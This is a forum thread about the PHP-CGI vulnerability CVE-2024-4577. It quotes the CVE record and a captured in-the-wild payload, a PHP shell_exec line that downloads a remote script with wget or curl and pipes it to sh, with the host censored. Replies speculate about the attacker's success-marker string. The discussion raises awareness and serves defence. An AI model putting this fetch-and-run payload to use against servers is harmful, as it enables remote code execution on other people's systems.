CVE-2024-4577 PHP bug

Two comments about this:

  1. Be aware that it is around, particularly if you actually run PHP.

Description from CVE record dated 9 June:

In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, when using Apache and PHP-CGI on Windows, if the system is set up to use certain code pages, Windows may use “Best-Fit” behavior to replace characters in command line given to Win32 API functions. PHP CGI module may misinterpret those characters as PHP options, which may allow a malicious user to pass options to PHP binary being run, and thus reveal the source code of scripts, run arbitrary PHP code on the server, etc.

(I can see that it says “Windows” but it can’t always be assumed that the bug will never work on Linux. In this particular case it seems as if it could really be Windows-specific.)

  1. My web server saw an occurrence of this, with the PHP code being
<?php shell_exec("SC=$(wget -O- || curl; echo \"\$SC\" | sh -s cve_2024_4577"); echo(md5("Hello CVE-2024-4577")); ?>

(where I’ve censored the IP address from which some dodgy first stage shell script will be downloaded)

So is this black hat and the vulnerability is being exploited in the wild and the hacker has a sense of humour (to point me directly at the correct CVE number)

or is this white hat attempting to locate vulnerable servers and warn them?

I think black hat.

(I’ve chosen not to exhibit the URL that is actually sent to the web server in order to trigger this bug.)


I am pretty confident that their message was to indicate to themselves whether or not their exploit was successful, although if I had to assume a role of a malicious attacker, I would not disclose the CVE during that process.

1 Like

Yes, code like echo(md5("Hello CVE-2024-4577")) is quite common - to show with overwhelming probability that the exploit worked - but the string being hashed would not usually be the CVE number. :slight_smile:

One observation is that at the time that an exploit first commences, the hacker would not know the CVE number. So this is either a copycat attack or it’s white hat. My thinking is: a copycat attack derived in part or in full from the now released fix or information.

1 Like